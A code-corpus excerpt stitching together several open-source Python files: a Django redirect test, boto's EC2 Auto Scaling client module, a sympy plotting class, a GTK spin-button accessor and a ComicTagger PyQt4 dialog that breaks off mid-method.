aerophile/django | tests/view_tests/tests/test_specials.py | 66 | 1428 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.test import TestCase, override_settings
@override_settings(ROOT_URLCONF='view_tests.generic_urls')
class URLHandling(TestCase):
"""
Tests for URL handling in views and responses.
"""
redirect_target = "/%E4%B8%AD%E6%96%87/target/"
def test_combining_redirect(self):
"""
Tests that redirecting to an IRI, requiring encoding before we use it
in an HTTP response, is handled correctly. In this case the arg to
HttpRedirect is ASCII but the current request path contains non-ASCII
        characters, so this test ensures that building the full path from a
        non-ASCII base is handled correctly.
"""
response = self.client.get('/中文/')
self.assertRedirects(response, self.redirect_target)
def test_nonascii_redirect(self):
"""
Tests that a non-ASCII argument to HttpRedirect is handled properly.
"""
response = self.client.get('/nonascii_redirect/')
self.assertRedirects(response, self.redirect_target)
def test_permanent_nonascii_redirect(self):
"""
Tests that a non-ASCII argument to HttpPermanentRedirect is handled
properly.
"""
response = self.client.get('/permanent_nonascii_redirect/')
self.assertRedirects(response, self.redirect_target, status_code=301)
| bsd-3-clause |
lochiiconnectivity/boto | boto/ec2/autoscale/__init__.py | 2 | 33259 | # Copyright (c) 2009-2011 Reza Lotun http://reza.lotun.name/
# Copyright (c) 2011 Jann Kleen
# Copyright (c) 2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
This module provides an interface to the Elastic Compute Cloud (EC2)
Auto Scaling service.
"""
import base64
import boto
from boto.connection import AWSQueryConnection
from boto.ec2.regioninfo import RegionInfo
from boto.ec2.autoscale.request import Request
from boto.ec2.autoscale.launchconfig import LaunchConfiguration
from boto.ec2.autoscale.group import AutoScalingGroup
from boto.ec2.autoscale.group import ProcessType
from boto.ec2.autoscale.activity import Activity
from boto.ec2.autoscale.policy import AdjustmentType
from boto.ec2.autoscale.policy import MetricCollectionTypes
from boto.ec2.autoscale.policy import ScalingPolicy
from boto.ec2.autoscale.policy import TerminationPolicies
from boto.ec2.autoscale.instance import Instance
from boto.ec2.autoscale.scheduled import ScheduledUpdateGroupAction
from boto.ec2.autoscale.tag import Tag
RegionData = {
'us-east-1': 'autoscaling.us-east-1.amazonaws.com',
'us-west-1': 'autoscaling.us-west-1.amazonaws.com',
'us-west-2': 'autoscaling.us-west-2.amazonaws.com',
'sa-east-1': 'autoscaling.sa-east-1.amazonaws.com',
'eu-west-1': 'autoscaling.eu-west-1.amazonaws.com',
'ap-northeast-1': 'autoscaling.ap-northeast-1.amazonaws.com',
'ap-southeast-1': 'autoscaling.ap-southeast-1.amazonaws.com',
'ap-southeast-2': 'autoscaling.ap-southeast-2.amazonaws.com',
}
def regions():
"""
Get all available regions for the Auto Scaling service.
:rtype: list
:return: A list of :class:`boto.RegionInfo` instances
"""
regions = []
for region_name in RegionData:
region = RegionInfo(name=region_name,
endpoint=RegionData[region_name],
connection_cls=AutoScaleConnection)
regions.append(region)
return regions
def connect_to_region(region_name, **kw_params):
"""
Given a valid region name, return a
:class:`boto.ec2.autoscale.AutoScaleConnection`.
:param str region_name: The name of the region to connect to.
:rtype: :class:`boto.ec2.AutoScaleConnection` or ``None``
:return: A connection to the given region, or None if an invalid region
name is given
"""
for region in regions():
if region.name == region_name:
return region.connect(**kw_params)
return None
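# Illustrative usage (a sketch, not part of the original module; assumes AWS
# credentials are available via the boto config or environment):
#
#     import boto.ec2.autoscale
#     conn = boto.ec2.autoscale.connect_to_region('us-west-2')
#     if conn is not None:
#         for group in conn.get_all_groups():
#             print group.name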
class AutoScaleConnection(AWSQueryConnection):
APIVersion = boto.config.get('Boto', 'autoscale_version', '2011-01-01')
DefaultRegionEndpoint = boto.config.get('Boto', 'autoscale_endpoint',
'autoscaling.us-east-1.amazonaws.com')
DefaultRegionName = boto.config.get('Boto', 'autoscale_region_name',
'us-east-1')
def __init__(self, aws_access_key_id=None, aws_secret_access_key=None,
is_secure=True, port=None, proxy=None, proxy_port=None,
proxy_user=None, proxy_pass=None, debug=0,
https_connection_factory=None, region=None, path='/',
security_token=None, validate_certs=True):
"""
Init method to create a new connection to the AutoScaling service.
B{Note:} The host argument is overridden by the host specified in the
boto configuration file.
"""
if not region:
region = RegionInfo(self, self.DefaultRegionName,
self.DefaultRegionEndpoint,
AutoScaleConnection)
self.region = region
AWSQueryConnection.__init__(self, aws_access_key_id,
aws_secret_access_key,
is_secure, port, proxy, proxy_port,
proxy_user, proxy_pass,
self.region.endpoint, debug,
https_connection_factory, path=path,
security_token=security_token,
validate_certs=validate_certs)
def _required_auth_capability(self):
return ['hmac-v4']
def build_list_params(self, params, items, label):
"""
Items is a list of dictionaries or strings::
[
{
'Protocol' : 'HTTP',
'LoadBalancerPort' : '80',
'InstancePort' : '80'
},
..
] etc.
or::
['us-east-1b',...]
"""
# different from EC2 list params
for i in xrange(1, len(items) + 1):
if isinstance(items[i - 1], dict):
for k, v in items[i - 1].iteritems():
if isinstance(v, dict):
for kk, vv in v.iteritems():
params['%s.member.%d.%s.%s' % (label, i, k, kk)] = vv
else:
params['%s.member.%d.%s' % (label, i, k)] = v
elif isinstance(items[i - 1], basestring):
params['%s.member.%d' % (label, i)] = items[i - 1]
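    # Illustrative expansion (sketch): for label 'AvailabilityZones' and
    # items ['us-east-1b', 'us-east-1c'] this produces
    #     params['AvailabilityZones.member.1'] = 'us-east-1b'
    #     params['AvailabilityZones.member.2'] = 'us-east-1c'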
def _update_group(self, op, as_group):
params = {'AutoScalingGroupName': as_group.name,
'LaunchConfigurationName': as_group.launch_config_name,
'MinSize': as_group.min_size,
'MaxSize': as_group.max_size}
# get availability zone information (required param)
zones = as_group.availability_zones
self.build_list_params(params, zones, 'AvailabilityZones')
if as_group.desired_capacity:
params['DesiredCapacity'] = as_group.desired_capacity
if as_group.vpc_zone_identifier:
params['VPCZoneIdentifier'] = as_group.vpc_zone_identifier
if as_group.health_check_period:
params['HealthCheckGracePeriod'] = as_group.health_check_period
if as_group.health_check_type:
params['HealthCheckType'] = as_group.health_check_type
if as_group.default_cooldown:
params['DefaultCooldown'] = as_group.default_cooldown
if as_group.placement_group:
params['PlacementGroup'] = as_group.placement_group
if as_group.termination_policies:
self.build_list_params(params, as_group.termination_policies,
'TerminationPolicies')
if op.startswith('Create'):
# you can only associate load balancers with an autoscale
# group at creation time
if as_group.load_balancers:
self.build_list_params(params, as_group.load_balancers,
'LoadBalancerNames')
if as_group.tags:
for i, tag in enumerate(as_group.tags):
tag.build_params(params, i + 1)
return self.get_object(op, params, Request)
def create_auto_scaling_group(self, as_group):
"""
Create auto scaling group.
"""
return self._update_group('CreateAutoScalingGroup', as_group)
def delete_auto_scaling_group(self, name, force_delete=False):
"""
Deletes the specified auto scaling group if the group has no instances
and no scaling activities in progress.
"""
        if force_delete:
params = {'AutoScalingGroupName': name, 'ForceDelete': 'true'}
else:
params = {'AutoScalingGroupName': name}
return self.get_object('DeleteAutoScalingGroup', params, Request)
def create_launch_configuration(self, launch_config):
"""
Creates a new Launch Configuration.
:type launch_config: :class:`boto.ec2.autoscale.launchconfig.LaunchConfiguration`
:param launch_config: LaunchConfiguration object.
"""
params = {'ImageId': launch_config.image_id,
'LaunchConfigurationName': launch_config.name,
'InstanceType': launch_config.instance_type}
if launch_config.key_name:
params['KeyName'] = launch_config.key_name
if launch_config.user_data:
params['UserData'] = base64.b64encode(launch_config.user_data)
if launch_config.kernel_id:
params['KernelId'] = launch_config.kernel_id
if launch_config.ramdisk_id:
params['RamdiskId'] = launch_config.ramdisk_id
if launch_config.block_device_mappings:
self.build_list_params(params, launch_config.block_device_mappings,
'BlockDeviceMappings')
if launch_config.security_groups:
self.build_list_params(params, launch_config.security_groups,
'SecurityGroups')
if launch_config.instance_monitoring:
params['InstanceMonitoring.Enabled'] = 'true'
else:
params['InstanceMonitoring.Enabled'] = 'false'
if launch_config.spot_price is not None:
params['SpotPrice'] = str(launch_config.spot_price)
if launch_config.instance_profile_name is not None:
params['IamInstanceProfile'] = launch_config.instance_profile_name
if launch_config.ebs_optimized:
params['EbsOptimized'] = 'true'
else:
params['EbsOptimized'] = 'false'
return self.get_object('CreateLaunchConfiguration', params,
Request, verb='POST')
def create_scaling_policy(self, scaling_policy):
"""
Creates a new Scaling Policy.
:type scaling_policy: :class:`boto.ec2.autoscale.policy.ScalingPolicy`
:param scaling_policy: ScalingPolicy object.
"""
params = {'AdjustmentType': scaling_policy.adjustment_type,
'AutoScalingGroupName': scaling_policy.as_name,
'PolicyName': scaling_policy.name,
'ScalingAdjustment': scaling_policy.scaling_adjustment}
if scaling_policy.cooldown is not None:
params['Cooldown'] = scaling_policy.cooldown
return self.get_object('PutScalingPolicy', params, Request)
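    # Illustrative usage (a sketch; the group and policy names are
    # hypothetical):
    #     policy = ScalingPolicy(name='scale-up', as_name='my-group',
    #                            adjustment_type='ChangeInCapacity',
    #                            scaling_adjustment=2, cooldown=180)
    #     conn.create_scaling_policy(policy)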
def delete_launch_configuration(self, launch_config_name):
"""
Deletes the specified LaunchConfiguration.
The specified launch configuration must not be attached to an Auto
Scaling group. Once this call completes, the launch configuration is no
longer available for use.
"""
params = {'LaunchConfigurationName': launch_config_name}
return self.get_object('DeleteLaunchConfiguration', params, Request)
def get_all_groups(self, names=None, max_records=None, next_token=None):
"""
Returns a full description of each Auto Scaling group in the given
list. This includes all Amazon EC2 instances that are members of the
group. If a list of names is not provided, the service returns the full
details of all Auto Scaling groups.
This action supports pagination by returning a token if there are more
pages to retrieve. To get the next page, call this action again with
the returned token as the NextToken parameter.
:type names: list
:param names: List of group names which should be searched for.
:type max_records: int
:param max_records: Maximum amount of groups to return.
:rtype: list
:returns: List of :class:`boto.ec2.autoscale.group.AutoScalingGroup`
instances.
"""
params = {}
if max_records:
params['MaxRecords'] = max_records
if next_token:
params['NextToken'] = next_token
if names:
self.build_list_params(params, names, 'AutoScalingGroupNames')
return self.get_list('DescribeAutoScalingGroups', params,
[('member', AutoScalingGroup)])
def get_all_launch_configurations(self, **kwargs):
"""
Returns a full description of the launch configurations given the
specified names.
If no names are specified, then the full details of all launch
configurations are returned.
:type names: list
:param names: List of configuration names which should be searched for.
:type max_records: int
:param max_records: Maximum amount of configurations to return.
:type next_token: str
:param next_token: If you have more results than can be returned
at once, pass in this parameter to page through all results.
:rtype: list
:returns: List of
:class:`boto.ec2.autoscale.launchconfig.LaunchConfiguration`
instances.
"""
params = {}
max_records = kwargs.get('max_records', None)
names = kwargs.get('names', None)
if max_records is not None:
params['MaxRecords'] = max_records
if names:
self.build_list_params(params, names, 'LaunchConfigurationNames')
next_token = kwargs.get('next_token')
if next_token:
params['NextToken'] = next_token
return self.get_list('DescribeLaunchConfigurations', params,
[('member', LaunchConfiguration)])
def get_all_activities(self, autoscale_group, activity_ids=None,
max_records=None, next_token=None):
"""
Get all activities for the given autoscaling group.
This action supports pagination by returning a token if there are more
pages to retrieve. To get the next page, call this action again with
the returned token as the NextToken parameter
:type autoscale_group: str or
:class:`boto.ec2.autoscale.group.AutoScalingGroup` object
:param autoscale_group: The auto scaling group to get activities on.
:type max_records: int
:param max_records: Maximum amount of activities to return.
:rtype: list
:returns: List of
:class:`boto.ec2.autoscale.activity.Activity` instances.
"""
name = autoscale_group
if isinstance(autoscale_group, AutoScalingGroup):
name = autoscale_group.name
params = {'AutoScalingGroupName': name}
if max_records:
params['MaxRecords'] = max_records
if next_token:
params['NextToken'] = next_token
if activity_ids:
self.build_list_params(params, activity_ids, 'ActivityIds')
return self.get_list('DescribeScalingActivities',
params, [('member', Activity)])
def get_termination_policies(self):
"""Gets all valid termination policies.
These values can then be used as the termination_policies arg
when creating and updating autoscale groups.
"""
return self.get_object('DescribeTerminationPolicyTypes',
{}, TerminationPolicies)
def delete_scheduled_action(self, scheduled_action_name,
autoscale_group=None):
"""
Deletes a previously scheduled action.
:type scheduled_action_name: str
:param scheduled_action_name: The name of the action you want
to delete.
:type autoscale_group: str
:param autoscale_group: The name of the autoscale group.
"""
params = {'ScheduledActionName': scheduled_action_name}
if autoscale_group:
params['AutoScalingGroupName'] = autoscale_group
return self.get_status('DeleteScheduledAction', params)
def terminate_instance(self, instance_id, decrement_capacity=True):
"""
Terminates the specified instance. The desired group size can
also be adjusted, if desired.
:type instance_id: str
:param instance_id: The ID of the instance to be terminated.
:type decrement_capability: bool
:param decrement_capacity: Whether to decrement the size of the
autoscaling group or not.
"""
params = {'InstanceId': instance_id}
if decrement_capacity:
params['ShouldDecrementDesiredCapacity'] = 'true'
else:
params['ShouldDecrementDesiredCapacity'] = 'false'
return self.get_object('TerminateInstanceInAutoScalingGroup', params,
Activity)
def delete_policy(self, policy_name, autoscale_group=None):
"""
Delete a policy.
:type policy_name: str
:param policy_name: The name or ARN of the policy to delete.
:type autoscale_group: str
:param autoscale_group: The name of the autoscale group.
"""
params = {'PolicyName': policy_name}
if autoscale_group:
params['AutoScalingGroupName'] = autoscale_group
return self.get_status('DeletePolicy', params)
def get_all_adjustment_types(self):
return self.get_list('DescribeAdjustmentTypes', {},
[('member', AdjustmentType)])
def get_all_autoscaling_instances(self, instance_ids=None,
max_records=None, next_token=None):
"""
Returns a description of each Auto Scaling instance in the instance_ids
list. If a list is not provided, the service returns the full details
of all instances up to a maximum of fifty.
This action supports pagination by returning a token if there are more
pages to retrieve. To get the next page, call this action again with
the returned token as the NextToken parameter.
:type instance_ids: list
:param instance_ids: List of Autoscaling Instance IDs which should be
searched for.
:type max_records: int
:param max_records: Maximum number of results to return.
:rtype: list
:returns: List of
:class:`boto.ec2.autoscale.instance.Instance` objects.
"""
params = {}
if instance_ids:
self.build_list_params(params, instance_ids, 'InstanceIds')
if max_records:
params['MaxRecords'] = max_records
if next_token:
params['NextToken'] = next_token
return self.get_list('DescribeAutoScalingInstances',
params, [('member', Instance)])
def get_all_metric_collection_types(self):
"""
Returns a list of metrics and a corresponding list of granularities
for each metric.
"""
return self.get_object('DescribeMetricCollectionTypes',
{}, MetricCollectionTypes)
def get_all_policies(self, as_group=None, policy_names=None,
max_records=None, next_token=None):
"""
Returns descriptions of what each policy does. This action supports
pagination. If the response includes a token, there are more records
available. To get the additional records, repeat the request with the
response token as the NextToken parameter.
If no group name or list of policy names are provided, all
available policies are returned.
:type as_name: str
:param as_name: The name of the
:class:`boto.ec2.autoscale.group.AutoScalingGroup` to filter for.
:type names: list
:param names: List of policy names which should be searched for.
:type max_records: int
:param max_records: Maximum amount of groups to return.
"""
params = {}
if as_group:
params['AutoScalingGroupName'] = as_group
if policy_names:
self.build_list_params(params, policy_names, 'PolicyNames')
if max_records:
params['MaxRecords'] = max_records
if next_token:
params['NextToken'] = next_token
return self.get_list('DescribePolicies', params,
[('member', ScalingPolicy)])
def get_all_scaling_process_types(self):
"""
Returns scaling process types for use in the ResumeProcesses and
SuspendProcesses actions.
"""
return self.get_list('DescribeScalingProcessTypes', {},
[('member', ProcessType)])
def suspend_processes(self, as_group, scaling_processes=None):
"""
Suspends Auto Scaling processes for an Auto Scaling group.
:type as_group: string
:param as_group: The auto scaling group to suspend processes on.
:type scaling_processes: list
:param scaling_processes: Processes you want to suspend. If omitted,
all processes will be suspended.
"""
params = {'AutoScalingGroupName': as_group}
if scaling_processes:
self.build_list_params(params, scaling_processes,
'ScalingProcesses')
return self.get_status('SuspendProcesses', params)
def resume_processes(self, as_group, scaling_processes=None):
"""
Resumes Auto Scaling processes for an Auto Scaling group.
:type as_group: string
:param as_group: The auto scaling group to resume processes on.
:type scaling_processes: list
:param scaling_processes: Processes you want to resume. If omitted, all
processes will be resumed.
"""
params = {'AutoScalingGroupName': as_group}
if scaling_processes:
self.build_list_params(params, scaling_processes,
'ScalingProcesses')
return self.get_status('ResumeProcesses', params)
def create_scheduled_group_action(self, as_group, name, time=None,
desired_capacity=None,
min_size=None, max_size=None,
start_time=None, end_time=None,
recurrence=None):
"""
Creates a scheduled scaling action for a Auto Scaling group. If you
leave a parameter unspecified, the corresponding value remains
unchanged in the affected Auto Scaling group.
:type as_group: string
:param as_group: The auto scaling group to get activities on.
:type name: string
:param name: Scheduled action name.
:type time: datetime.datetime
        :param time: The time for this action to start. (Deprecated; use start_time.)
:type desired_capacity: int
:param desired_capacity: The number of EC2 instances that should
be running in this group.
:type min_size: int
:param min_size: The minimum size for the new auto scaling group.
:type max_size: int
        :param max_size: The maximum size for the new auto scaling group.
:type start_time: datetime.datetime
:param start_time: The time for this action to start. When StartTime and EndTime are specified with Recurrence, they form the boundaries of when the recurring action will start and stop.
:type end_time: datetime.datetime
:param end_time: The time for this action to end. When StartTime and EndTime are specified with Recurrence, they form the boundaries of when the recurring action will start and stop.
:type recurrence: string
        :param recurrence: The schedule for recurring future actions, specified in Unix cron syntax (for example, '0 10 * * *').
"""
params = {'AutoScalingGroupName': as_group,
'ScheduledActionName': name}
if start_time is not None:
params['StartTime'] = start_time.isoformat()
if end_time is not None:
params['EndTime'] = end_time.isoformat()
if recurrence is not None:
params['Recurrence'] = recurrence
if time:
params['Time'] = time.isoformat()
if desired_capacity is not None:
params['DesiredCapacity'] = desired_capacity
if min_size is not None:
params['MinSize'] = min_size
if max_size is not None:
params['MaxSize'] = max_size
return self.get_status('PutScheduledUpdateGroupAction', params)
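    # Illustrative usage (a sketch; the group and action names are
    # hypothetical): schedule a recurring capacity change every day at 10:00.
    #     conn.create_scheduled_group_action('my-group', 'daily-scale-up',
    #                                        desired_capacity=4,
    #                                        recurrence='0 10 * * *')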
def get_all_scheduled_actions(self, as_group=None, start_time=None,
end_time=None, scheduled_actions=None,
max_records=None, next_token=None):
params = {}
if as_group:
params['AutoScalingGroupName'] = as_group
if scheduled_actions:
self.build_list_params(params, scheduled_actions,
'ScheduledActionNames')
if max_records:
params['MaxRecords'] = max_records
if next_token:
params['NextToken'] = next_token
return self.get_list('DescribeScheduledActions', params,
[('member', ScheduledUpdateGroupAction)])
def disable_metrics_collection(self, as_group, metrics=None):
"""
Disables monitoring of group metrics for the Auto Scaling group
specified in AutoScalingGroupName. You can specify the list of affected
metrics with the Metrics parameter.
"""
params = {'AutoScalingGroupName': as_group}
if metrics:
self.build_list_params(params, metrics, 'Metrics')
return self.get_status('DisableMetricsCollection', params)
def enable_metrics_collection(self, as_group, granularity, metrics=None):
"""
Enables monitoring of group metrics for the Auto Scaling group
specified in AutoScalingGroupName. You can specify the list of enabled
metrics with the Metrics parameter.
Auto scaling metrics collection can be turned on only if the
InstanceMonitoring.Enabled flag, in the Auto Scaling group's launch
configuration, is set to true.
:type autoscale_group: string
:param autoscale_group: The auto scaling group to get activities on.
:type granularity: string
:param granularity: The granularity to associate with the metrics to
collect. Currently, the only legal granularity is "1Minute".
:type metrics: string list
:param metrics: The list of metrics to collect. If no metrics are
specified, all metrics are enabled.
"""
params = {'AutoScalingGroupName': as_group,
'Granularity': granularity}
if metrics:
self.build_list_params(params, metrics, 'Metrics')
return self.get_status('EnableMetricsCollection', params)
def execute_policy(self, policy_name, as_group=None, honor_cooldown=None):
params = {'PolicyName': policy_name}
if as_group:
params['AutoScalingGroupName'] = as_group
if honor_cooldown:
params['HonorCooldown'] = honor_cooldown
return self.get_status('ExecutePolicy', params)
def put_notification_configuration(self, autoscale_group, topic, notification_types):
"""
Configures an Auto Scaling group to send notifications when
specified events take place.
:type as_group: str or
:class:`boto.ec2.autoscale.group.AutoScalingGroup` object
:param as_group: The Auto Scaling group to put notification
configuration on.
:type topic: str
:param topic: The Amazon Resource Name (ARN) of the Amazon Simple
Notification Service (SNS) topic.
:type notification_types: list
:param notification_types: The type of events that will trigger
the notification.
"""
name = autoscale_group
if isinstance(autoscale_group, AutoScalingGroup):
name = autoscale_group.name
params = {'AutoScalingGroupName': name,
'TopicARN': topic}
self.build_list_params(params, notification_types, 'NotificationTypes')
return self.get_status('PutNotificationConfiguration', params)
def set_instance_health(self, instance_id, health_status,
should_respect_grace_period=True):
"""
Explicitly set the health status of an instance.
:type instance_id: str
:param instance_id: The identifier of the EC2 instance.
:type health_status: str
:param health_status: The health status of the instance.
"Healthy" means that the instance is healthy and should remain
in service. "Unhealthy" means that the instance is unhealthy.
Auto Scaling should terminate and replace it.
:type should_respect_grace_period: bool
:param should_respect_grace_period: If True, this call should
respect the grace period associated with the group.
"""
params = {'InstanceId': instance_id,
'HealthStatus': health_status}
if should_respect_grace_period:
params['ShouldRespectGracePeriod'] = 'true'
else:
params['ShouldRespectGracePeriod'] = 'false'
return self.get_status('SetInstanceHealth', params)
def set_desired_capacity(self, group_name, desired_capacity, honor_cooldown=False):
"""
Adjusts the desired size of the AutoScalingGroup by initiating scaling
activities. When reducing the size of the group, it is not possible to define
which Amazon EC2 instances will be terminated. This applies to any Auto Scaling
decisions that might result in terminating instances.
:type group_name: string
:param group_name: name of the auto scaling group
:type desired_capacity: integer
:param desired_capacity: new capacity setting for auto scaling group
:type honor_cooldown: boolean
        :param honor_cooldown: if True, respect any cooldown period
            associated with the group; by default the cooldown is overridden
"""
params = {'AutoScalingGroupName': group_name,
'DesiredCapacity': desired_capacity}
if honor_cooldown:
            params['HonorCooldown'] = 'true'
return self.get_status('SetDesiredCapacity', params)
# Tag methods
def get_all_tags(self, filters=None, max_records=None, next_token=None):
"""
Lists the Auto Scaling group tags.
This action supports pagination by returning a token if there
are more pages to retrieve. To get the next page, call this
action again with the returned token as the NextToken
parameter.
:type filters: dict
:param filters: The value of the filter type used to identify
the tags to be returned. NOT IMPLEMENTED YET.
:type max_records: int
:param max_records: Maximum number of tags to return.
:rtype: list
:returns: List of :class:`boto.ec2.autoscale.tag.Tag`
instances.
"""
params = {}
if max_records:
params['MaxRecords'] = max_records
if next_token:
params['NextToken'] = next_token
return self.get_list('DescribeTags', params,
[('member', Tag)])
def create_or_update_tags(self, tags):
"""
Creates new tags or updates existing tags for an Auto Scaling group.
:type tags: List of :class:`boto.ec2.autoscale.tag.Tag`
:param tags: The new or updated tags.
"""
params = {}
for i, tag in enumerate(tags):
tag.build_params(params, i + 1)
return self.get_status('CreateOrUpdateTags', params, verb='POST')
def delete_tags(self, tags):
"""
Deletes existing tags for an Auto Scaling group.
:type tags: List of :class:`boto.ec2.autoscale.tag.Tag`
:param tags: The new or updated tags.
"""
params = {}
for i, tag in enumerate(tags):
tag.build_params(params, i + 1)
return self.get_status('DeleteTags', params, verb='POST')
| mit |
18padx08/PPTex | PPTexEnv_x86_64/lib/python2.7/site-packages/sympy/plotting/pygletplot/plot_curve.py | 25 | 2853 | from __future__ import print_function, division
from pyglet.gl import *
from plot_mode_base import PlotModeBase
from sympy.core import S
from sympy.core.compatibility import xrange
class PlotCurve(PlotModeBase):
style_override = 'wireframe'
def _on_calculate_verts(self):
self.t_interval = self.intervals[0]
self.t_set = list(self.t_interval.frange())
self.bounds = [[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0]]
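        # Each per-axis entry holds [min, max, span]: min/max start at
        # +/-infinity and are tightened as vertices are evaluated; the span
        # is computed below once all vertices are known.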
evaluate = self._get_evaluator()
self._calculating_verts_pos = 0.0
self._calculating_verts_len = float(self.t_interval.v_len)
self.verts = list()
b = self.bounds
for t in self.t_set:
try:
_e = evaluate(t) # calculate vertex
except (NameError, ZeroDivisionError):
_e = None
if _e is not None: # update bounding box
for axis in range(3):
b[axis][0] = min([b[axis][0], _e[axis]])
b[axis][1] = max([b[axis][1], _e[axis]])
self.verts.append(_e)
self._calculating_verts_pos += 1.0
for axis in range(3):
b[axis][2] = b[axis][1] - b[axis][0]
if b[axis][2] == 0.0:
b[axis][2] = 1.0
self.push_wireframe(self.draw_verts(False))
def _on_calculate_cverts(self):
if not self.verts or not self.color:
return
def set_work_len(n):
self._calculating_cverts_len = float(n)
def inc_work_pos():
self._calculating_cverts_pos += 1.0
set_work_len(1)
self._calculating_cverts_pos = 0
self.cverts = self.color.apply_to_curve(self.verts,
self.t_set,
set_len=set_work_len,
inc_pos=inc_work_pos)
self.push_wireframe(self.draw_verts(True))
def calculate_one_cvert(self, t):
vert = self.verts[t]
return self.color(vert[0], vert[1], vert[2],
self.t_set[t], None)
def draw_verts(self, use_cverts):
def f():
glBegin(GL_LINE_STRIP)
for t in xrange(len(self.t_set)):
p = self.verts[t]
if p is None:
glEnd()
glBegin(GL_LINE_STRIP)
continue
if use_cverts:
c = self.cverts[t]
if c is None:
c = (0, 0, 0)
glColor3f(*c)
else:
glColor3f(*self.default_wireframe_color)
glVertex3f(*p)
glEnd()
return f
| mit |
R3v1L/evogtk | evogtk/gui/accessclasslib/spinbutton.py | 2 | 1871 | # -*- coding: utf-8 -*-
###############################################################################
# Copyright (C) 2008 EVO Sistemas Libres <[email protected]>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# checkbutton
# EVOGTK Access class for gtk.CheckButton, gtk.ToggleButton, gtk.ToggleAction widgets
###############################################################################
# GTK Imports
import gtk
# DBWidgets imports
from evogtk.widgets import DBSpinButton
class AccessClass:
"""
Class for gtk.SpinButton
"""
def supported_widgets(self):
"""
Supported widgets for this access class
"""
return [gtk.Adjustment,gtk.SpinButton,DBSpinButton]
def supported_types(self):
"""
Supported types for this access class
"""
return [int,float]
def set_content(self,widget,content):
"""
Method for setting the widget content
"""
widget.set_value(content)
def get_content(self,widget):
"""
Method for setting the widget content
"""
return widget.get_value()
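# Illustrative usage (a sketch, not part of the original module; the widget
# construction is hypothetical):
#     access = AccessClass()
#     spin = gtk.SpinButton(gtk.Adjustment(0, 0, 100, 1))
#     access.set_content(spin, 42)
#     value = access.get_content(spin)  # -> 42.0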
| mit |
2mny/mylar | lib/comictaggerlib/matchselectionwindow.py | 1 | 4989 | """
A PyQT4 dialog to select from automated issue matches
"""
"""
Copyright 2012-2014 Anthony Beville
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
import os
from PyQt4 import QtCore, QtGui, uic
from PyQt4.QtCore import QUrl, pyqtSignal, QByteArray
from imagefetcher import ImageFetcher
from settings import ComicTaggerSettings
from comicarchive import MetaDataStyle
from coverimagewidget import CoverImageWidget
from comicvinetalker import ComicVineTalker
import utils
class MatchSelectionWindow(QtGui.QDialog):
volume_id = 0
def __init__(self, parent, matches, comic_archive):
super(MatchSelectionWindow, self).__init__(parent)
uic.loadUi(ComicTaggerSettings.getUIFile('matchselectionwindow.ui' ), self)
self.altCoverWidget = CoverImageWidget( self.altCoverContainer, CoverImageWidget.AltCoverMode )
gridlayout = QtGui.QGridLayout( self.altCoverContainer )
gridlayout.addWidget( self.altCoverWidget )
gridlayout.setContentsMargins(0,0,0,0)
self.archiveCoverWidget = CoverImageWidget( self.archiveCoverContainer, CoverImageWidget.ArchiveMode )
gridlayout = QtGui.QGridLayout( self.archiveCoverContainer )
gridlayout.addWidget( self.archiveCoverWidget )
gridlayout.setContentsMargins(0,0,0,0)
utils.reduceWidgetFontSize( self.twList )
utils.reduceWidgetFontSize( self.teDescription, 1 )
self.setWindowFlags(self.windowFlags() |
QtCore.Qt.WindowSystemMenuHint |
QtCore.Qt.WindowMaximizeButtonHint)
self.matches = matches
self.comic_archive = comic_archive
self.twList.currentItemChanged.connect(self.currentItemChanged)
self.twList.cellDoubleClicked.connect(self.cellDoubleClicked)
self.updateData()
def updateData( self):
self.setCoverImage()
self.populateTable()
self.twList.resizeColumnsToContents()
self.twList.selectRow( 0 )
path = self.comic_archive.path
self.setWindowTitle( u"Select correct match: {0}".format(
os.path.split(path)[1] ))
def populateTable( self ):
while self.twList.rowCount() > 0:
self.twList.removeRow(0)
self.twList.setSortingEnabled(False)
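        # Sorting is disabled while rows are inserted so Qt does not reorder
        # them mid-population; it is re-enabled after the table is filled.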
row = 0
for match in self.matches:
self.twList.insertRow(row)
item_text = match['series']
item = QtGui.QTableWidgetItem(item_text)
item.setData( QtCore.Qt.ToolTipRole, item_text )
item.setData( QtCore.Qt.UserRole, (match,))
item.setFlags(QtCore.Qt.ItemIsSelectable| QtCore.Qt.ItemIsEnabled)
self.twList.setItem(row, 0, item)
if match['publisher'] is not None:
item_text = u"{0}".format(match['publisher'])
else:
